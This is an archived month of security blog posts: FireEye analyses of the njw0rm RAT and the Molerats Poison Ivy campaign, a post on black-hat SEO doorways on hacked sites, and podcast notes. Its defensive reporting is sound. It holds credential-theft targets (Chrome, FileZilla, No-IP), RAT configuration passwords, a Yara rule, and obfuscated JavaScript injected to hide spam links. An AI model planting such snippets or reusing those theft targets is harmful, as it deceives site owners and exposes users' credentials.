Monthly Archives: August 2013

Njw0rm – Brother From the Same Mother

FireEye Labs has discovered an intriguing new sibling of the njRAT remote access tool (RAT) that one-ups its older "brother" with a couple of diabolically clever features. Created by the same author as njRAT —a freelance coder who goes by the moniker njq8 — the new njw0rm malware has the ability to spread using removable computer storage and can steal login credentials to a popular dynamic DNS service.

The older njRAT was first documented about a year ago by FireEye as Backdoor.LV. Most of the command-and-control (CnC) infrastructure associated with njRAT, like many of its targets, were based in the Middle East. The CnC servers associated with njw0rm are also based in the Middle East, though we have not yet seen njw0rm used in targeted attacks.

Njw0rm has the usual RAT features, but adds a key enhancement — it is designed to spread via removable devices such as USB drives. FireEye researchers have seen njw0rm delivered initially through malicious links in emails and using drive-by downloads on compromised websites. The malware aims to steal user credentials, execute commands, and receive future updates from the attacker.


Njw0rm is coded in Visual Basic script, but requires AutoIt to build the dropper. It provides an attacker with common options such as the ability to designate a name for its binary, configure its CnC servers, whether to “melt” or delete the binary after execution, and so on.


When you first start the builder, it asks you to assign a port for incoming traffic (1888 by default).


Control panel

The control panel contains a window for logging and another window with details of active infections.


The name of the infected machine is followed by the serial number of the %homedrive%. It also includes information on its location, OS (and service pack installations), removable storage devices present, and currently active windows.

The following functions are available from the control panel:


Data Theft

The Get Passwords command has the capability to steal passwords from three different sources:

  • FTP passwords stored under %appdata%\Filezilla\recentservers.xml
  • Chrome browser passwords in \Google\Chrome\User Data\Default\Login Data\
  • Account credentials for the No-IP dynamic DNS service by reading the registry key at HKLM\SOFTWARE\Vitalwerks\DUC and base64-decoding it

The credentials stored inside Google Chrome’s Web browser are decrypted locally using the CryptUnprotectData() function provided by Crypt32.dll. This API enables an application to decrypt Triple-DES encrypted passwords as long as they are encrypted with the same logon credentials.

The ability to steal No-IP credentials is unique. Many threat actors use dynamic DNS domains for their infrastructure. So an attacker with stolen No-IP credentials could use the service to perform reconnaissance or target other systems.

Callback Communication

The Njw0rm bot connects to the CnC server and waits for commands. If no command is received, the worm sends the following information to the following hard-coded domain:port every two seconds.


The above code roughly translates to:

“lv” + 0njxq80 + name_serial + 0njxq80 + Kernel32.dll.GetLocaleInfo()+ 0njxq80 + OS info + 0njxq80 + worm version + 0njxq80 + removable drive available + 0njxq80 + title of active window

Like njRAT, njw0rm uses the "lv" keyword and as a field separator.


The Worm Aspect

Njw0rm constantly checks for removable devices present on the host. If a removable drive’s status is “Ready” and it has more than 1024 megabytes free, njw0rm creates a hidden My Pictures directory (if it doesn't already exist). It then gets a list of 10 folders on the removable drive, hides those 10 folders, and creates shortcut links with the same names for each of them — all pointing to the malware executable. When unsuspecting users click on one of the shortcuts to open what they think is a familiar folder, they execute the worm instead.


Connections to njRAT

Looking at the comments section of the code, researchers can conclude that njw0rm is coded by njq8, the author who also created njRAT. Although njw0rm’s communications are not base64 encoded, it uses the same keyword "lv" at the beginning of every communication and “0njxq80” as a delimiter instead of “|”, two features that are identical to njRAT’s communication.

The malware's author is prolific. According to his profile, he lives in Kuwait and is a coder for hire.worm19

Based on the comments in the source code, njworm was last updated on May 16th with version 0.3.3a. We have seen versions ranging from 0.2 – 0.4d in the wild. The newer version likely includes bot-killer functionality that was left unfinished in 0.3.3a.

worm20CnC Information

We have seen communications back to the following domains and ports:  1888  18888  81  1888  18  1888  1888  1888  8888  4040 8888

Geolocations of CnC

Most of the njworm's CnC infrastructure is hosted in the Middle East — just like njRAT — with a few exceptions.



The Njw0rm RAT is clearly authored by the same person who wrote njRAT. Like njRAT, most of the njw0rm CnC infrastructure is also hosted in the Middle East. The callback structure is also similar to njRAT. Currently, the worm does not appear to be used in a targeted fashion. But based on the callback data, njw0rm is evolving quickly — so expect to see more of it in the future.

(Special thanks to Thoufique Haq for his help with this research.)

File hashes

02b32f094ddc1b5d0c0ab86a5fae7c91 02dc77b3ae7a17a6720eec9624b24ae9 02e144a10e8f3a24a335a96cd69f8086 053702add48f4455088798fff2b4e690 05b5008acd534f4e419902c85f169531 07c65bd8926cf6c249bc04470b555c65 08f240f494a5e4f2cbfb9f764d1738e6 0f828b31bb91fcdcf1533ed7cd3e3313 110d0b6e29d84dd2f690703197082743 12f679546ada9d65c21a8e879128139d 13977ef247db77c11b9b8f407c9f3f6c 1c448c5488ac4a391f6fae0a5880adaf 1cb5a011c3888aa981d8f3cc0c74fc2e 21af26854fa5318d1f8787ebbc9dce20 253647d1ee71c19c136db94b9f7af3d2 2cf983063f2a33685f34ab53d076d2ce 2dc7b434520365c6ab3f5bdadcb84765 2fe7df0c84f6bb0d53922bbe79123295 42f549140f5fec8f63c118d649b1659f 4c60493b14c666c56db163203e819272 57d8b563b587aecee18387a016f49710 5c12b6694032134f213a51df047c5968 7717e996de4d1444c76b3ab4432027b2 7e5c0b55917721a7463b00c89c8f3154 807e6783a4212e1fb20a6f1f0a7b006b 86022d7f987e9cf54fad35a89c3d9e84 908634d98e166031e0904575ed7f4e2e 93d8dc5ff775ef8d9f9355e8e516e232 9c25d1a88bf96f73207a57ccb184d993 a36117133263dc538d2b9291835d94e9 a62b3a47e485fda57d5f183ebb237683 a89c76bce3d8eab6451da7d579bbd9fa a90a254d547042cd2936f9c89359c442 ab6e0b3d0cf57c507935578987c289c3 b0e1d20accd9a2ed29cdacb803e4a89d b412222c50bd51b4770245cfee71346b ba2952386cd8295ca69665b65a24e635 bab466ab747c94e55d0c1685404cc548 f06c6fd7ee79f035b0b683364d5f2af2 f0abdb8084a416e8353bc520abe0471b f3ae62b63f3b78b9c0be30d0ffd10592 f6b31d4abeb50db38093003bd93dc02e f863f3878ebd2e449beb78dc214380ab ff573fc5a7c9b12fa15c984eb0228a64

Exploiting Embedded Systems, Drunken Security News – Episode 342 – August 22, 2013

Zachary Cutlip is a security researcher with Tactical Network Solutions, in Columbia, MD. At TNS, Zach develops exploitation techniques targeting embedded systems and network infrastructure. Since 2003, Zach has worked either directly for or with the National Security Agency in various capacities. Before embracing a lifestyle of ripped jeans and untucked shirts, he spent six years in the US Air Force, parting ways at the rank of Captain. Zach holds an undergraduate degree from Texas A&M University and a master's degree from Johns Hopkins University.

Zach will be going over how he does research on exploiting embedded systems and his exploit development framework bowcaster.

Interview with Phil “Soldier of Fortran” Young – Episode 342 – August 22, 2013

Philip Young, aka Soldier of Fortran, is a mainframe phreak! His love of mainframes goes back to when he watched Tron, wide eyed, for the first time. Though it would be decades until he actually got his hands on one he was always interested in their strangeness. Phil has always been in to security since his days as a sysop and playing around on Datapac (the Telenet of Canada). Some people build toy trains, others model airplanes, but Phil's hobby is mainframe security.

Operation Molerats: Middle East Cyber Attacks Using Poison Ivy

Don't be too hasty to link every Poison Ivy-based cyber attack to China. The popular remote access tool (RAT), which we recently detailed on this blog, is being used in a broad campaign of attacks launched from the Middle East, too.

First, some background:

In October 2012, malware attacks against Israeli government targets grabbed media attention as officials temporarily cut off Internet access for its entire police force and banned the use of USB memory sticks. [1] Security researchers subsequently linked these attacks to a broader, yearlong campaign that targeted not just Israelis but Palestinians as well. [2] — and as discovered later, even the U.S. and UK governments. [3] Further research revealed a connection between these attacks and members of the so-called “Gaza Hackers Team.” We refer to this campaign as “Molerats.” 

Threat actors in specific geographic regions may prefer one RAT to another, but many RATs are publicly available and used by a variety of threat actors, including those involved in malware-based espionage.

In 2012, the Molerats attacks appeared to rely heavily on the XtremeRAT, a freely available tool that is popular with attackers based in the Middle East. [5] But the group has also used Poison Ivy (PIVY), a RAT more commonly associated with threat actors in China [6] — so much so that PIVY has, inaccurately, become synonymous with all APT attacks linked to China.

This blog post analyzes several recent Molerats attacks that deployed PIVY against targets in the Middle East and in the U.S. We also examine additional PIVY attacks that leverage Arabic-language content related to the ongoing crisis in Egypt and the wider Middle East to lure targets into opening malicious files. [7]

Enter Poison Ivy

We observed several attacks in June and July 2013 against targets in the Middle East and the U.S. that dropped a PIVY payload that connected to command-and-control (CnC) infrastructure used by the Molerats attackers.


The malware sample we analyzed was unusual for two reasons:

  • It referenced an article that was published last year
  • The compile time for the dropped binary was also dated from last year, seemingly consistent with the referenced article. But this malware was signed, and — in contrast to the compile time, which can be faked — the signing time on its certificate was much more recent: Monday, July 08, 2013 1:45:10 A.M.

Here are the file details:

Hamas shoot down Israeli F-16 fighter jet by modern weapon in Gaza sea.doc- - - - - - - - - - - -.scr

MD5: 7084f3a2d63a16a191b7fcb2b19f0e0d


This malware was signed with a forged Microsoft certificate similar to previous XtremeRat samples. But the serial number (which is often reused by attackers, enabling FireEye researchers to link individual attacks, including those by the Molerats) is different this time.


The malware dropped an instance of PIVY with the following configuration:


ID: F16 08-07-2013


DNS/Port: Direct:,

Proxy DNS/Port:

Proxy Hijack: No

ActiveX Startup Key:

HKLM Startup Entry:

File Name:

Install Path: C:\Documents and Settings\Admin\Local Settings\Temp\morse.exe

Keylog Path: C:\Documents and Settings\Admin\Local Settings\Temp\morse

Inject: No

Process Mutex: gdfgdfgdg

Key Logger Mutex:

ActiveX Startup: No

HKLM Startup: No

Copy To: No

Melt: No

Persistence: No

Keylogger: No

Password: !@#GooD#@!


We collected additional PIVY samples that had the same password or linked to CnC infrastructure at a common IP address (or both). We observed three PIVY passwords (another potential identifier) used in the attacks: “!@#GooD#@!”, “!@#Goood#@!” and “admin100”.

Additional Samples with Middle Eastern Themes

We also found a PIVY sample used by this group that leveraged what are known as key files instead of passwords. The PIVY builder allows operators to load .pik files containing a key to secure communications between the compromised computer and the attacker's machine. By default, PIVY secures these communications with the ascii text password of "admin" — when the same non-default password appears in multiple attacks, researchers can conclude that the attacks are related.

The PIVY sample in question had an MD5 hash of 9dff139bbbe476770294fb86f4e156ac and communicated with a CnC server at over port 443. The key file used to secure communications contained the following ascii string ‘Password (256 bits):\x0d\x0aA9612889F6’ (where \x0d\x0a represents a line break).


The 9dff139bbbe476770294fb86f4e156ac sample dropped a decoy document in Arabic that included a transcript of an interview with Salam Fayyad, the former Prime Minister of the Palestinian National Authority.

The sample 16346b95e6deef9da7fe796c31b9dec4 was also seen communicating with over port 443. This sample appears to have been delivered to its targets via a link to a RAR archive labeled Ramadan.rar (fc554a0ad7cf9d4f47ec4f297dbde375) hosted at the Dropbox file-sharing website.


The sample a8714aac274a18f1724d9702d40030bf dropped a decoy document in Arabic that contained a biography of General Adbel Fattah el-Sisi – the Commander-in-Chief of the Egyptian Armed Forces.


A recent sample (d9a7c4a100cfefef995785f707be895c) used protests in Egypt to entice recipients to open a malicious file.


Another sample (b0a9abc76a2b4335074a13939c59bfc9) contained a decoy with a grim picture of Fadel Al Radfani, who was the adviser to the defense minister of Yemen before he was assassinated.

Although we are seeing Egyptian- and Middle Eastern-themed attacks using decoy content in Arabic, we cannot determine the intended targets of all of these attacks.

Delivery Vector

We believe that the Molerats attacker uses spear phishing to deliver weaponized RAR files containing their malicious payloads to their victims in at least two different ways. The Molerats actor will in some cases attach the weaponized RAR file directly to their spear- phishing-emails. We also believe that this actor sends spear-phishing emails that include links to RAR files hosted on third-party platforms such as Dropbox.

In one such example we found the following link was used to host Ramadan.rar (fc554a0ad7cf9d4f47ec4f297dbde375):


CnC Infrastructure

We have found 15 PIVY samples that can be linked through common passwords, common CnC domain names, and common IP addresses to which the CnC domains resolve. The CnC servers for this cluster of activity are:


Two of the domain names ( and that were used as CnCs for PIVY were both documented as XtremeRat CnCs that were used in previous attacks. [8]


We focused on these domains and their IP addresses — which they had in common with In addition, we added the well-known CnCs and used in previously documented attacks.

By observing changes in DNS resolution that occurred within the same timeframe, we were able to ensure that the passive DNS data we collected was the same. Interestingly, we also found that the domains often shifted to a new IP address over time.

CnC Date IP 2013-07-10 22:06:56
2013-07-10 22:05:31
2013-07-10 23:45:46
2013-07-10 23:48:41
2013-07-10 23:48:41
2013-07-10 22:06:56
2013-07-10 22:05:31
2013-07-10 23:45:46
2013-07-10 23:48:41
2013-07-10 23:48:41 2013-07-16 09:14:30
2013-07-16 11:33:21
2013-07-16 12:47:59
2013-07-16 12:50:51
2013-07-16 12:50:51
2013-07-16 09:14:30
2013-07-16 11:33:21
2013-07-16 12:47:59
2013-07-16 12:50:51
2013-07-16 12:50:51 2013-07-21 15:00:38
2013-07-21 15:28:43
2013-07-21 16:31:07
2013-07-21 15:00:38
2013-07-21 15:28:43
2013-07-21 16:31:07 2013-07-21 22:06:19
2013-07-21 22:04:49
2013-07-21 22:06:19
2013-07-21 22:04:49 2013-07-29 15:38:21
2013-07-29 15:35:52
2013-07-29 16:46:35
2013-07-29 16:49:27
2013-07-29 16:49:27
2013-07-29 15:38:21
2013-07-29 15:35:52
2013-07-29 16:46:35
2013-07-29 16:49:27
2013-07-29 16:49:27 2013-07-10 22:05:31
2013-07-10 22:06:35
2013-07-10 22:06:37
2013-07-10 22:06:56
2013-07-10 22:19:03
2013-07-10 22:19:31
2013-07-10 22:05:31
2013-07-10 22:06:35
2013-07-10 22:06:37
2013-07-10 22:06:56
2013-07-10 22:19:03
2013-07-10 22:19:31 2013-08-10 14:07:38
2013-08-10 14:08:43
2013-08-10 14:07:38
2013-08-10 14:08:43

One interesting discovery concerns a sample (5b740b4623b2d1049c0036a6aae684b0) that was first seen by VirusTotal on September 14, 2012. This date is within the timeframe of the original XtremeRat attacks, but the payload in this case was PIVY. This indicates that the attackers have been using PIVY in addition to XtremeRat for longer than we had originally believed.


We do not know whether using PIVY is an attempt by those behind the Molerats campaign to frame China-based threat actors for their attacks or simply evidence that they have added another effective, publicly-available RAT to its arsenal. But this development should raise a warning flag for anyone tempted to automatically attribute all PIVY attacks to threat actors based in China. The ubiquity of off-the-shelf RATs makes determining those responsible an increasing challenge.

The ongoing attacks are also heavily leveraging content in Arabic that uses conflicts in Egypt and the wider Middle East to lure targets into opening malicious files. But we have no further information about the exact targets of these Arabic lures.

As events on the ground in the Middle East — and in Egypt in particular — receive international attention, we expect the Molerat operators to continue leveraging these headlines to catalyze their operations.







6. /content/dam/legacy/resources/pdfs/fireeye-poison-ivy-report.pdf

7. The Molerats group also uses addition RATs such as XtremeRat, Cerberus, Cybergate, but we have focused on their used of PIVY in this blog.


Yara Signature

This Yara signature can be used to locate signed samples that have the new certificate serial numbers used by Molerats.


rule Molerats_certs



author = “FireEye Labs”

description = “this rule detections code signed with certificates used by the Molerats actor”


$cert1 = {06 50 11 A5 BC BF 83 C0 93 28 16 5E 7E 85 27 75}

$cert2 = {03 e1 e1 aa a5 bc a1 9f ba 8c 42 05 8b 4a bf 28}

$cert3 = {0c c0 35 9c 9c 3c da 00 d7 e9 da 2d c6 ba 7b 6d}


1 of ($cert*)



















Analyzing [Buy Cialis] Search Results

A few days ago I was updating the spammy word highlighting functionality in Unmask Parasites results and needed to test the changes on real websites. To find hacked websites with spammy content I would normally google for [viagra] or [cialis], which are arguably the most targeted keywords used in black hat SEO hacks. However after the Google’s June update in how they rank web pages for spammy queries, I didn’t have much expectation of seeing hacked sites on the first page of search results for my usual [buy cialis] query and was ready to check a few more pages.

Indeed, for queries like [payday loans] I can see quite relevant results on the first three pages. All sites are specialized and don’t look like doorways on hacked sites. That’s really good. For [viagra] I found only one result on the first page pointing to a doorway on a hacked site. Still good.

However, when I entered a really spammy combination [buy viagra], the search results were less than optimal — 5 out of 10 led to hacked sites. And at least 2 out of the rest 5 specialized sites were promoted using hidden links on hacked sites. Not good. And the worst results (although ideal for testing my update) were for the [buy cialis] query — 100% of results on the first page (10 out of 10) led to doorways on hacked sites or simply spammy web pages. Not a single result from websites that really have anything to do with cialis.

buy cialis results

Results analysis

Here is the breakdown of the first 10 results (links go to real time Unmask Parasites reports for these pages and at the moment of writing they all reveal spammy content. However this may change over time):

  1. www.epmonthly .com/advertise/ — doorway on a hacked site
  2. werenotsorry .com/ — strange spammy site with a rubbish content like this “The car buy cialis in your car is the ultimate well source of electrical amazing power in your car.
  3. incose .org/dom/ — doorway on a hacked site.
  4. www.deercrash .org/buy/cialis/online/ — doorway on a hacked site
  5. jon-odell .com/?p=54 — doorway on a hacked site
  6. www.goodgrief .org .au/Cialis/ — doorway on a hacked site
  7. www.asm .wisc .edu/buy-cialis — doorway on a hacked site
  8. www.mhfa .com .au/cms/finance-home/ — doorway on a hacked site
  9. www .plowtoplate .org/library/51.html — doorway on a hacked site
  10. john-leung .com/?p=16 — doorway on a hacked site

Over the course of the past week the results slightly fluctuated and sometimes I saw the following links on the first SERP.

Out of 18 links that I encountered on the first page for [buy cialis] 15 point to doorways on hacked sites, 1 to a site with unreadable machine-generated text (still not sure whether it’s some SEO experiment or a backdoor with a tricky search traffic processing procedure) and 2 specialized sites relevant to the query but with quite bad backlink profiles. Overall 0% of results that follow Google’s quality guidelines.

So the Google’s update for spammy queries doesn’t seem to work as it should at least for some über spammy queries. It’s sad. And the reason why I’m sad is not that I worry about people who use such queries on Google to buy some counterfeit drugs. My major concern is this situation justifies the huge number of sites (many thousands) that cyber-criminals hack in order to put a few of their doorways to the top for relevant queries on Google.

Behind the scenes

The above 15 hacked sites that I found on the first Google’s SERP are actually only a tip of the iceberg. Each of them is being linked to from many thousands (if not millions) pages from similarly hacked sites. Here you can see a sample list of sites that link to the above 15 (you might need a specialized tool like Unmask Parasites to see hidden and cloaked links there).

Many of the hacked web pages link to more than one doorway page, which maximizes changes that one of them will be finally chosen by Google to be displayed on the first page for one of the many targeted keywords. And at the same time this helps to have a pool of alternative doorways in case some of them will be removed by webmasters or penalized by Google. As a result, the networks of doorways, landing pages and link pages can be very massive. Here you can see a list with just a small part of spammy links (338 unique domains) that can be found on hacked web pages.

.gov, .edu and .org

Among those hacked sites you can find sites of many reputable organizations, which most likely greatly help to rank well on Google. There are many compromised sites of professional associations, universities and even governmental sites, for example (as of August 19th, 2013):

Volume of spammy backlinks

If you take some of the top results and check their backlink profiles (I used Majestic SEO Site Explorer), you’ll see how many domains can be compromised (or spammed) just in one black hat SEO campaign. And we know that there are many ongoing competing campaigns just for “cialis” search traffic, so you can imaging the overall impact.

backlink profile

On the above screenshot you can see that thousands of domains linking to “www .epmonthly .com/advertise/” using various “cialis” keywords.

The situation with “www. epmonthly .com/advertise/” is quite interesting. If you google for [“www.epmonthly .com/advertise/”] you’ll see more than a million results pointing to web pages where spammers used automated tools to post spammy links (including this one) in comments, profiles , etc. but failed to verify whether those sites accept the HTML code they were posting (still many sites, while escaping the HTML code, automatically make all URLs clickable, so those spammers finally achive their goal) .

Typical black hat SEO tricks

In addition to annoying but pretty harmless comment spamming, forum spamming and creating fake user profiles, black hats massively hack websites with established reputation and turn them into their SEO assets.

The most common use for a hacked site is injecting links pointing to promoted resources (it can be a final landing page, or a doorway, or an intermediary site with links). Here is what such web pages may look like in Unmask Parasites reports:

spammy keyword highlighting

To hide such links from site owners, hackers make them hidden. For example, they can place them in an off-screen <div>

<div style="position:absolute; left:-8745px;">...spammy links here...</div>

Or put them in a normal <div> and add a JavaScript to make this <div> invisible when a browser loads the page

<div id='hideMe'> ... spammy links here.... </div>
<script type='text/javascript'>if(document.getElementById('hideMe') != null){document.getElementById('hideMe').style.visibility = 'hidden';document.getElementById('hideMe').style.display = 'none';}</script>

The JavaScript can be encrypted.

e v a l(function(p,a,c,k,e,d){e=function(c){return(c<a?"":e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)d[e(c)]=k[c]||e(c);k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1;};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p;}('2.1(\'0\').5.4="3";',6,6,'bestlinks|getElementById|document|none|display|style'.split('|'),0,{}))

which translates to


where “bestlinks” is the id of the <div> with spammy links.

Sometimes, encrypted JavaScript can be coupled with dynamic HTML generation of the link container. After decryption it looks like this:

document.w ri t e('<style><!-- .read {display:none} --></style><address class="read">');
...spammy links here...
document.wri te('</address>');

Of course, it’s only a client-side representation of the problem. On the server side, it’s rarely this straightforward. Most times it involves obfuscated (usually PHP) code in sneaky places (e.g. themes, plugins, DB, etc.)


Sites that rely on black hat SEO techniques get penalized by Google soon enough so the can’t expect much search traffic directly from search engines. Instead they try to promote many disposable doorways on other reputable sites that would redirect search traffic to them.

The typical approach is to hack a website and use cloaking tricks (generating a specialized version with spammy keywords specifically for search engines while leaving the original content for normal visitors) to make search engines think that its pages are relevant for those spammy queries. E.g. check the title of the “www.epmonthly .com/advertise/” when you visit it in a browser (“Advertise“) and when you check it in Unmask Parasites or in Google’s Cache (“Buy Cialis (Tadalafil) Online – OVERNIGHT Shipping“). Then they add some functionality to distinguish visitors coming from search engines and redirect them to third party sites that pay hackers for such traffic.

The redirects may be implemented as .htaccess rules, client-side JavaScript code, or server-side PHP code.

Sometimes, instead of using cloaking, hackers simply create a whole spammy section in a subdirectory of a legitimate site, or a standalone doorway page. Example from our cialis search results: www .asm .wisc .edu/buy-cialis .

To Webmasters

It might be tricky to determine whether your site fell victim to a black hat SEO hack since hackers do their best to hide evidence from site owners and regular visitors. At the same time antivirus tools won’t help you here since links and redirects (in case they can actually see them) are not considered harmful. Nonetheless, a thoughtful webmaster is always equipped with proper tools and tricks (click here for details) to determine such issues. They range from specialized Google search queries and and reports in Webmaster Tools to log analysis and server-side integrity control.

In addition to the tricks that I described here, you can try to simply load your site with JavaScript turned off. Sometimes this is all it takes to find hidden links whose visibility is controlled by a script.

Fighting black hat SEO hacks

Of course, site owners are responsible for what happens with their sites, should protect them and clean them up in case of hacks. Doorways on hacked sites would never appear in search results if all webmasters would quickly mitigate such issues.

But let’s take a look at this from a different perspective. The main goal of all black hat SEO hacks is to put their doorways to the top on Google for relevant keywords and get a targeted search traffic. And 80% (or even more) massive campaigns target a very narrow set of keywords and their modification. If Google actively monitor the first pages of search results for such keywords and penalize doorways, this could significantly reduce efficacy of such campaigns leaving very few incentive to hack website to put spammy links there. And you don’t have to monitor every possible keyword combination. In my experience, most of them will finally point to the same doorways.

I can see Google moving in this direction. The description of the above mentioned ranking algorithm update is very promising. However, as the [buy cialis] query with 0% of relevant search results on the first page shows — a lot should be improved.

P.S Just before posting this article, I checked results for [buy cialis] once more and … surprise!.. found a link to a Wikipedia article about Tadalafil at the 4th position. Wow! Now we have 1 result that doesn’t seem to have anything to do with hacked sites.

Related posts

Poison Ivy: Assessing Damage and Extracting Intelligence

Today, our research team is publishing a report on the Poison Ivy family of remote access tools (RATs) along with a package of tools created to work as a balm of sorts — naturally, we’re calling the package “Calamine.”

In an era of sophisticated cyber attacks, you might wonder why we’re even bothering with this well-known, downright ancient pest. As we explain in the paper, dismissing Poison Ivy could be a costly mistake.

RATs may well be the hacker’s equivalent of training wheels, as they are often regarded in IT security circles. But despite their reputation as a software toy for novice “script kiddies,” RATs remain a linchpin of many sophisticated cyber attacks and are used by numerous threat actors.

Requiring little technical savvy, RATs offer unfettered access to compromised machines. They are deceptively simple — attackers can point and click their way through the target’s network to steal data and intellectual property. But they are often delivered as a key component of coordinated attacks that use previously unknown (zero-day) software flaws and clever social engineering.

Even as security professionals shrug off the threat, the presence of a RAT may in itself indicate a targeted attack known as an advanced persistent threat (APT). Unlike malware focused on opportunistic cybercrime (typically conducted by botnets of compromised machines), RATs require a live person on the other side of the attack.

Poison Ivy has been used in several high-profile malware campaigns, most infamously, the 2011 compromise of RSA SecurID data. The same year, Poison Ivy powered a coordinated attack dubbed “Nitro” against chemical makers, government offices, defense firms, and human-rights groups.

We have discovered several nation-state threat actors actively using Poison Ivy, including the following:

  • admin@338 — Active since 2008, this actor mostly targets the financial services industry, though we have also seen activity in the telecom, government, and defense sectors.
  • th3bug — First detected in 2009, this actor targets a number of industries, primarily higher education and healthcare.
  • menuPass — Also first detected in 2009, this actor targets U.S. and overseas defense contractors.

Understanding why Poison Ivy remains one of the most widely used RATs is easy. Controlled through a familiar Windows interface, it offers a bevy of handy features: key logging, screen capture, video capturing, file transfers, password theft, system administration, traffic relaying, and more.

Here is how a typical Poison Ivy attack works:

  1. The attacker sets up a custom PIVY server, tailoring details such as how Poison Ivy will install itself on the target computer, what features are enabled, the encryption password, and so on.
  2. The attacker sends the PIVY server installation file to the targeted computer. Typically, the attacker takes advantage of a zero-day flaw. The target executes the file by opening an infected email attachment, for example, or visiting a compromised website.
  3. The server installation file begins executing on the target machine. To avoid detection by anti-virus software, it downloads additional code as needed through an encrypted communication channel.
  4. Once the PIVY server is up and running on the target machine, the attacker uses a Windows GUI client to control the target computer.

Poison Ivy is so widely used that security professionals have a harder time tracing attacks that use the RAT to any particular attacker.

We hope to eliminate some of that anonymity with the Calamine package. The package, which enables organizations to easily monitor Poison Ivy’s behavior and communications, includes these components:

ChopShop[1] is a new framework developed by the MITRE Corporation for network-based protocol decoders that enable security professionals to understand actual commands issued by human operators controlling endpoints. The FireEye PIVY module for ChopShop decrypts Poison Ivy network traffic.

PyCommands, meanwhile, are Python scripts that automate tasks for Immunity Debugger, a popular tool for reverse-engineering malware binaries.[2] The FireEye PyCommand script dumps configuration information from a running PIVY process on an infected endpoint, which can provide additional telemetry about the threat actor behind the attack.

FireEye is sharing the Calamine tools with the security community at large under the BSD 2-Clause license[3] for both commercial and non-commercial use worldwide.

By tracking the PIVY server activity, security professionals can find these telltale indicators:

  • The domains and IPs used for CnC
  • The attacker’s PIVY process mutex
  • The attacker’s PIVY password
  • The launcher code used in the malware droppers
  • A timeline of malware activity

The FireEye report explains how Calamine can connect these and other facets of the attack. This evidence is especially useful when it is correlated with multiple attacks that display the same identifying features. Combining these nitty-gritty details with big-picture intelligence can help profile threat attackers and enhance IT defenses.

Calamine may not stop determined APT actors from using Poison Ivy. But it can complicate their ability to hide behind this commodity RAT.

Full details are available, here:

[1] ChopShop is available for download at

[2] Immunity Debugger is available at

[3] For more information about the BSD 2-Clause License, see the Open Source Initiative’s template at

Richard Bejtlich on His Latest Book, “The Practice of Network Security Monitoring”

Practice of Network Security MonitoringThe Practice of Network Security Monitoring

Everyone wants to know how to find intruders on their networks. I learned one approach when I served in the Air Force Computer Emergency Response Team (AFCERT) as a captain from 1998 to 2001. When I left the service and brought my refinements of network security monitoring (NSM) to the commercial world, I decided that at some point I would explain what I knew in book form for the good of the computer network defense community.

In July 2004, I published my first book, The Tao of Network Security Monitoring: Beyond Intrusion Detection . Although I had published material on NSM in 2002 in Hacking Exposed, 4th Edition and in 2003 in Incident Response, 2nd Edition, the Tao was my first major contribution to the field of detecting and responding to intrusions using network-centric tools and tactics. I wrote two other books in the following two years, namely Extrusion Detection and Real Digital Forensics, the latter as a co-author. I wrote for the intermediate-to-advanced level audience, and people seemed to find the works useful.

I began teaching multi-day classes on NSM and related subjects in 2004, and in 2007 brought new classes on NSM to Black Hat. Over the years I kept my material at the intermediate-to-advanced level because I thought that sort of viewpoint was most needed. In late 2012, however, teaching for Black Hat in Dubai, I realized that for every intermediate-to-advanced student in my class, there were probably 100 or more introductory-level students trying to better understand security and their networks. By writing for people who I thought already "got" NSM, I ignored thousands of deserving readers and students.

In late December 2012 I decided it was time to a write a book for people who knew something about computers, networking, and security, but little to nothing about NSM or incident detection and response. I submitted a proposal to No Starch and began writing a new book the first week of January 2013, with the goal of having it in print for Black Hat in July 2013. Thanks to the fine work of No Starch's team and my editors and contributors, The Practice of Network Security Monitoring arrived in time for Black Hat last month.

If you want to know how to use network-derived evidence to detect and respond to intrusions, my new book is for you. I teach you why NSM matters, where and how to obtain visibility, how to collect and analyze traffic, and what to do when you find something suspicious or malicious. Although you may be able to use your existing tools and data to accomplish these goals, I demonstrate NSM using the amazing open source NSM distro Security Onion by Doug Burks and Scott Runnels. With nothing more than the investment in some reading time and downloading free software, you can start learning how intruders are abusing your network.

In addition to writing the new book for those at the introductory level of NSM practice, I also wrote a new class titled "NSM 101." I taught the material at Black Hat last month, and feedback was positive. I intend to teach the same course in Seattle for Black Hat on December 9-10, 2013 and again in 2014 in Vegas and elsewhere with Black Hat. I find that my network-centric approach nicely complements the powerful endpoint- and log-centric tools and capabilities available from Mandiant's products and services.

If you have questions about how NSM can help defend your organization, please feel free to send me a tweet via @taosecurity. I am happy to respond to thoughtful questions.

Denying Service to DDoS Protection Services, Drunken Security News – Episode 341 – August 16, 2013

After her presentation at Black Hat 2013, Allison is back in studio and will do a tech segment titled "Denying Service to DDOS Protection Services"

Are you not keeping your firmware up to date? Any chance that you're setting yourself up to be hit by the HP Integrated Lights-Out authentication bypass? If you're not going to be diligent about updating firmware and must have these things on the internet, then as Paul says, firewall the hell out of it and keep it away from the rest of your network.

Using a new scanning interface from Paul and Jack's employer, Tenable, you're able to see if your desktop software is out of date. Everyone's browser seemed to need updates and as we learned with some help from Carlos, you even need to update your pooty (PuTTY).

One of the many good lessons that can be gained from watching Security Weekly is "Don't screw with people's kids." Let's go one step further and say it's probably in poor form to call some random stranger's two year old a "slut". Larry and Paul tell us about a story where one of those baby monitor camera systems was "hacked" because it was on the internet and using the default (ie. no password) password. So someone was able to log in to the camera and shout expletives through the speakers, at the sleeping child and eventually at the parents. Ok, first as Jack already mentioned, don't screw with people's kids. Second, as Larry mentioned, why put this thing on the internet? Third, if you are going to put it on the internet, make it easier or more obvious that a default password needs to be changed. Or finally, as Jack mentions, it might be a little harder to support, but go with a handful of default passwords and put a sticker on the system to let people know what it is. That's a whole lot better than no password when this thing goes on the internet.

Leave it to Expert Steve to start a fire right in the Security Weekly studios.

Rob Graham over at Erratasec gives a nice behind-the-scenes account of the Blaster worm as it was already 10 years ago that the outbreak first happened. Rob talks about how he found out about the possibility, was soundly mocked even in his own company about the upcoming outbreak and even how he launched his own bloodless coup in his company. He simply told the CEO that a major problem was coming, that he knew how to fix it and he was taking over immediately. In spite of much preparation for a big fight, the CEO simply said "ok" and Rob was off and running. While it only took his in-house developers to create an exploit for the vulnerability, it took much longer than expected for it to be seen in the wild. It was eventually first seen on August 11, 2003. And Rob was vindicated.

